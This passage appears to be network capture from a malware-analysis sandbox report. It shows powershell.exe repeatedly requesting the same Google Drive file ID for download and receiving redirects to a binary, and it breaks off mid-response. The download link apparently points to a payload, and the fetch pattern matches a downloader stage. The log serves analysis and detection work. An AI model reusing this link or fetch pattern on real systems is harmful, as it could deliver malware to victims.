                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.949720142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:39 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:39 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:39 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce--I8hZ0DG-kPz9zAqtVaL_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.957668142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:44 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:44 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:44 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-8paJb31lFDlWyFpOxTFk7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.957671142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:49 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:49 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:49 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-bHQDzG0-MtvLXbeDjppFJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.957672142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:54 UTC97OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:58:54 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:54 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-K8GRp_-NLP6iXL5oe4BrTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.957673142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:59 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:59 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:59 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Bxeabr6YzKNGmltEFtm7TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.957674142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:04 UTC97OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:59:04 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:04 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-98EWQQVhbkpOVMVt5sr_rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.957675142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:09 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:09 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:09 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-l1GUvqizF68jxd_i6YtKNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.957677142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:14 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:14 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:14 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-d_CvC8nak__N8tbP71qQXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.957678142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:19 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:19 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:19 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-DBUB9ICD6vurMDs_LfAZhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.957679142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:24 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:24 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:24 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce--F6LyA0aVi3yQo-PCZNzwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.957680142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:29 UTC97OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:59:30 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:29 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-M4XoJ_HWf4_S1dgIe3qIOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.957681142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:35 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:36 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:35 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-YykLlPywab-6hEaTe0w6BA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.957682142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:40 UTC97OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:59:41 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:40 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-ry4vHU8cSctO5t9jkc5HGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.957684142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:45 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:46 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:46 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-tsT3CKu222tCTrkPOFDsdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.957685142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:51 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:51 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:51 GMT
